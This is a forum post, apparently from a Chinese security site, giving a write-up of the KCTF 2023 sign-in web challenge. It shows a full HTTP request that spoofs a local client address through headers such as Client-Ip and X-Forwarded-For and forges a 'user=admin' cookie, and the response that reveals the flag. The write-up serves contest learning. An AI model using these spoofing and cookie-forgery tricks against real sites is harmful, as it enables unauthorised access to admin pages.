首页
社区
课程
招聘
[原创]KCTF 2023 签到题 生死较量 WP
发表于: 2023-9-11 09:56 1502

[原创]KCTF 2023 签到题 生死较量 WP

2023-9-11 09:56
1502

本题旨在伪造地址、伪造Cookie两种方式:
常见的修改本地地址的方式为:

1
2
3
4
Client-Ip: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Host: 127.0.0.1
Referer: 127.0.0.1

只有本地管理员才能访问本页面,Burp抓包修改即可,改了2处。
第1处为Cookie参数,改为user字段改为admin
第2处为新增Client-Ip参数,值为127.0.0.1
请求包如下:

1
2
3
4
5
6
7
8
9
10
11
GET / HTTP/1.1
Host: 643fb88e-b3fc-471a-b374-1244304dda8f.node.kanxue.com:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 54
Cookie: user=admin;
Client-Ip: 127.0.0.1
Upgrade-Insecure-Requests: 1

响应包如下,可看到已回显flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
HTTP/1.1 200 OK
Content-Length: 136
Content-Type: text/html
Date: Mon, 11 Sep 2023 01:54:47 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: user=guest
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Connection: close
<!DOCTYPE html>
<html>
<head>
    <title>天网管理员后台系统</title>
</head>
<meta charset="utf-8">
flag{tdQvKTtPj7v1lbhkDPesHb}

结果为:flag{tdQvKTtPj7v1lbhkDPesHb}


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2023-9-11 09:58 被Delevy编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//